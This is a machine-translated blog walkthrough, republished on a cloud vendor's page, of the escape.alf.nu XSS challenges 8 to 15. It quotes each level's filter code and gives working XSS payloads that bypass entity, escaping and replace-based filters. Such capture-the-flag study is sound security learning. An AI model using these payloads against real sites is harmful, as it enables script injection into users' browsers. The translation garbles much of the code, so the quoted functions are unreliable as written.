Escape.alf.nu XSS challenges 8-15 Advanced XSS

Source: Internet
Author: User


This article link: http://blog.csdn.net/u012763794/article/details/51526725


Last time I told challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593, I should be more detailed than others, In fact, this needs to have a certain degree of XSS practice (own environment to make a no filter on it), to be familiar with JS

Needless to say, directly on the challenge, note: to alert (1) to Customs clearance


Challenge 8
function Escape (s) {  //courtesy of Skandiabanken  return ' <script>console.log ("' + s.touppercase () + '") & Lt;/script> ';}
This is the conversion of our input to uppercase.
Let's try the HTML entity character, that is, & #后面加十进制ascii, when you can also hex, such as & #x61, add an X on the back of the line we only convert English alert------>& #97 & #108 & #101 & #114 & #116Because it is HTML entity characters, only in the HTML element to take effect, we put the IMG tag to see

In addition, the HTML is not sensitive to case, that is, the case is the same as the meaning of the letter

It's a little bit long to be close.

Payload:</script><script >


There are other payload and retrofits.

</script>

</script><svg onload=& #97 & #108 & #101 & #114 & #116 (1)//

Hex-

</script><svg onload=& #x61 & #x6C & #x65 & #x72 & #x74 (1)//


Of course, you can also put a JS file on your own server, the contents of the File: alert (1);


If you have a short domain name, the character length will be shorter, and the short link should not be short.


Challenge 9
function Escape (s) {//This was sort of a spoiler for the last level  :-)  if (/[\\<>]/.test (s)) return '-'; 
   return ' <script>console.log ("' + s.touppercase () + '") </script> ';}
Here after practice, once matched to \, <, and > will return directly '-' and uppercase, and cannot enter < Can you change it for alert?CTFShould very often see Jsfuck, encrypted website: http://www.jsfuck.com/
That's a lot of characters.
Before the freebuf see there is a also do not use the letter JS encryption conversion, remember to write it again
Challenge 10
function Escape (s) {function htmlescape (s) {return s.replace (/./g, function (x) {return {' < ': ' &lt; ', ' > ': ' &gt; ', ' & ': ' &amp; ', ' ' ': ' &quot; ', ' ' ': ' & #39; '} [X] | |            X  });            } function Expandtemplate (template, args) {return template.replace (/{(\w+)}/g, function (_, N) {         Return Htmlescape (Args[n]);  }); } return Expandtemplate ("\ First we look at the last return, calling the Expandtemplate function to handle a string of HTML elements, while expandtemplate inside calls the Htmlescape

The Expandtemplate function seems to be useless, know the great God trouble tell me


Htmlescape single and double quotes,& and <,> are converted to HTML entity characters, but no filter \ Escape character

, then we use hex to see


Payload: \x3cimg src=123 onerror=alert (1)//\x3c is less than sign hex


You can see that JS converts a 16 binary to a character when processing a string.


Other payload,\x3e are greater than hex

\x3cimg src=123 Onerror=alert (1) \x3e

\x3csvg Onload=alert (1)/ /SVG This is HTML5 's canvas element.


Challenge 11
function Escape (s) {  //spoiler for Level 2  s = json.stringify (s). Replace (/<\/script/gi, ");  Return ' <script>console.log (' + S + ');</script> ';}
Stringify can be escaped ", the following replace is the replacement </script is a null character, G is the global mode, is to search from the beginning to the tail, no matter how many, I ignore the case
In SQL injection, replace with empty, and we'll just double-write it.
Payload: </sc</scriptript><script>alert (1)//Of course double write can casually engage </</scriptscript><script> Alert (1)//
</s</scriptcript><script>alert (1)//
............................ such as



Challenge 12

function Escape (s) {  //Pass Inn "Callback#userdata"  var thing = S.split (/#/);   if (!/^[a-za-z\[\] ']*$/.test (thing[0])) return ' Invalid callback ';  var obj = {' UserData ': thing[1]};  var json = json.stringify (obj). replace (/\//g, ' \\/');  Return "<script>" + thing[0] + "(" + JSON + ") </script>";}

var thing = S.split (/#/)

Separate two-part input with #

if (!/^[a-za-z\[\] ']*$/.test (thing[0])) return ' Invalid callback ';

#号 to the left can only enter uppercase and lowercase letters and left and right brackets

var json = json.stringify (obj). replace (/\//g, ' \\/');

Will be escaped, replacing replace/for \\/, is actually replaced by \/


The original HTML comments can also, it is simple


Single quotation mark closed in front, followed by comment

Payload: ' # '; alert (1);<!--



Challenge 13

function Escape (s) {  var tag = document.createelement (' iframe ');  For the-one, you get-to-run any code-want, but a "sandboxed" iframe.  //http://print.alf.nu/?html= just outputs whatever you pass in.  //Alerting from Print.alf.nu won ' t count, try to trigger the one below.  s = ' <script> ' + S + ' <\/script> ';  TAG.SRC = ' http://print.alf.nu/?html= ' + encodeuricomponent (s);  Window. WINNING = function () {Youwon = true;};  Tag.onload = function () {    if (youwon) alert (1);  };  Document.body.appendChild (tag);}
The encodeURIComponent () function is actually a URL code.

We look at the IFRAME, and when a Name property is set in the IFRAME, the value of the Name property becomes the global of the Window object in the IFRAME.

Like the ABC below.


A little more popular.


There is also a detail, that is, the URL, directly back to JS, set the name of the IFrame property


So payload:name= ' Youwon '



Challenge 14

function Escape (s) {function json (s) {return json.stringify (s)." Replace (/\//g, ' \ \ \ /‘); } function HTML (s) {return s.replace (/[<> "&]/g, function (s) {return ' + S.charc Odeat (0) + '; '; });     } return (' <script> ' + ' var url = ' + JSON (s) + ';//we\ ' ll use this later ' + ' </script>\n\n ' + ' <!--for debugging-->\n ' + ' URL: ' + HTML (s) + ' \ n ' + ' <!--then suddenly-->\n ' + ' <s cript>\n ' + ' if (!/^http:.*/.test (URL)) console.log ("Bad URL:" + URL); \ n ' + ' else new Image (). src = url;\n ' + ' </script> ');} 

First we look at the return function, return two script, the first <script> use the JSON (s) function to construct a URL, followed by the middle HTML () Output URL

The second script creates a new image of our URL if it is successfully bypassed

JSON functions filter double quotes and comment characters

The HTML function Filters <> "&

First look at what effect


Because it is more complicated, it is explained directly with the payload of others.

Alert (1);/*<!--<script>*/if (/a//*


Copy the right side to our local test


We can see that the last */* We entered commented out many of the following, removing the green code, and simplifying the code is

var url = "alert (1);\/*<!--<script>*\/if (\/a\/\/*  "; Url:alert (1); if (/a/.test (URL)) console.log ("Bad URL:" + URL); else new Image (). src = URL;
Just a little bit easier.


Just a little bit easier.



Challenge 15

function Escape (s) {  return s.split (' # '). Map (function (v) {      ///Only 20% of slashes is end tags; save 1.2% of Total      //bytes by only escaping those.      var json = json.stringify (v). Replace (/<\//g, ' <\\/');      Return ' <script>console.log (' +json+ ') </script> ';      }). Join (");}

payload:<!--<script>#)/;alert (1)//-->


Last generated code: <script>console.log ("<!--<script>") </script><script>console.log (")/;alert (1) --") </script> Copy to Local

Knock the middle of the center directly on the console.

Console.log ("<!--<script>") </script><script>console.log (")/;alert (1)//-->")


To simplify it, Console.log ("<!--<script>") </script><script>console.log (")/; Alert (1)

Console less than sign/regular expression/; Alert (1)

So it's syntactically correct.


It's actually two statements.


All right, welcome to my conversation.

This article link: http://blog.csdn.net/u012763794/article/details/51526725



Escape.alf.nu XSS challenges 8-15 Advanced XSS

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.